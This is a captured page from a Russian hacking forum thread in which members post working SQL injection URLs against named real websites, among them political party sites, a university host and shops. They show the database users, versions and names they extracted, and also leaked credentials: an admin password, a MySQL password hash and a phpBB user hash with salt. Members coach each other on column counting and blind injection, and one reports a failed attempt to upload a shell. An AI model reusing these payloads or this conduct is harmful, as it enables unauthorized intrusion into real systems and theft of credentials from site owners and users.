ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7361  
Старый 06.01.2009, 11:43
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://filtr-s.ru/?b=content&id=-1+union+select+concat(user(),0x3a,version(),0x3a,da  tabase())--
user(): u23366@78.108.81.81
version(): 5.0.67
database(): b23366

Код:
http://www.teatrdoc.ru/plays.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5--
user(): kinoteatr_mysql@194.85.92.114
version(): 4.1.22
database(): kinoteatr_td
тИЦ: 500
PR: 5



Код:
http://www.littlite.com/product.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7--
user(): littlite@localhost
version(): 5.0.32-Debian_7etch8-log
database(): littlite
тИЦ: 10
PR: 4
 
Ответить с цитированием

  #7362  
Старый 06.01.2009, 20:02
Аватар для maxpet1212
maxpet1212
Новичок
Регистрация: 26.04.2008
Сообщений: 3
Провел на форуме:
45149

Репутация: 0
По умолчанию

товарищи, поясните плз. как бороться с такими ситуациями:

http://www.respect.at/index.php?lang=1+order+by+3-- все норм.

а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--

The used SELECT statements have a different number of columns

и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.

спасибо.
 
Ответить с цитированием

  #7363  
Старый 06.01.2009, 20:02
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.sinodipc.ru/index.php?id=4+union+select+1,2,3,4,version(),6,7,8,9,10/*
4.1.22-log
 
Ответить с цитированием

  #7364  
Старый 06.01.2009, 20:38
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

Челябинский сайт партии яблоко:
Код:
http://www.chel.yabloko.ru/persons/print.phtml?id=-1+union+select+1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
version():5.0.32-Debian_7etch8-log
user():chel@localhost
database():chel
PR:6;тИЦ:2500;

Офиц. сайт главы этой партии:
Код:
http://www.yavlinsky.ru/news/index.phtml?id=-3484+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
version(): 5.0.32-Debian_7etch8-log
user(): gya@localhost
database(): gya
PR:6;тИЦ:750
(login:Администратор;password:adminforever),тока хз куда его вводить.

Офиц. сайт партии родина:
Код:
http://www.rodina-nps.ru/library/print/?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),user(),database()),16,17--
version():4.1.22-standard-log
user():rodinad_user@localhost
database():rodinad_test
PR:6;тИЦ:220;

Последний раз редактировалось foopi; 06.01.2009 в 20:40..
 
Ответить с цитированием

  #7365  
Старый 06.01.2009, 21:11
Аватар для Octave_Parango
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
Сообщение от foopi  
(login:Администратор;password:adminforever),тока хз куда его вводить.
Возможно тут, сам не пробовал:
h**p://yavlinsky.ru/manager/
 
Ответить с цитированием

  #7366  
Старый 06.01.2009, 21:21
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

Octave_Parango
не, не подходит
это из таблицы forum_users но к форуму тоже не подходит
 
Ответить с цитированием

  #7367  
Старый 06.01.2009, 21:33
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://www.lymphnotes.com/pro.php/id/68'

дальше чот не прёт

Последний раз редактировалось попугай; 06.01.2009 в 21:40..
 
Ответить с цитированием

  #7368  
Старый 06.01.2009, 23:18
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от maxpet1212  
товарищи, поясните плз. как бороться с такими ситуациями:

http://www.respect.at/index.php?lang=1+order+by+3-- все норм.

а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--

The used SELECT statements have a different number of columns

и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.

спасибо.
у тебя данные отличаються, то есть сначало при 1+order+by+3--
а при -1+union+select+1,2,3--
то есть вот
http://www.respect.at/index.php?lang=1+union+select+1,2,3--


Цитата:
Сообщение от попугай  
http://www.lymphnotes.com/pro.php/id/68'

дальше чот не прёт
Хуясе, 43 колонки
PHP код:
http://www.lymphnotes.com/pro.php?id=77'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x2f,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/* 
4.0.25/lncom@localhost/lncom

www.watercampws.uiuc.edu - пр6

http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,f ile_priv)+from+mysql.user+limit+4,1

kaap/%/7522af592a19ac45/Y

kaap:BlankPwd

Последний раз редактировалось AkyHa_MaTaTa; 07.01.2009 в 00:33..
 
Ответить с цитированием

  #7369  
Старый 07.01.2009, 01:18
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Код:
http://www.respect.at/index.php?lang=1+and+lower(substring(version(),1,11))=char(52,46,48,46,50,55,105,110,111,100,101)
version() - 4.0.27inode

Код:
http://www.respect.at/index.php?lang=1+and+lower(substring(user(),1,32))=char(114,101,48,48,48,51,51,48,64,117,98,104,48,49,45,111,117,116,50,46,117,98,104,46,105,110,111,100,101,46,97,116)
user() - re000330@ubh01-out2.ubh.inode.at

__________________________________________________ _______________________

"Мезотерапия Украины"

Код:
http://www.mesoterapia.org.ua/?mid=-40+union+select+version(),2,3--
 
Ответить с цитированием

  #7370  
Старый 07.01.2009, 02:38
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11--
avi@localhost:avi_corp_gov:5.0.67-log


PR:6
тИЦ: 500

Код:
http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,user_password),8,9,10,11+from+phpbb_users+limit+1,3--
froland:300c2f6225b9944ab0da38ecca94b4f7:mtmenj64

Форум phpbb тут http://www.corp-gov.ru/forums/

версия 2,0,23 шелл так и неполучилось залить=//
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ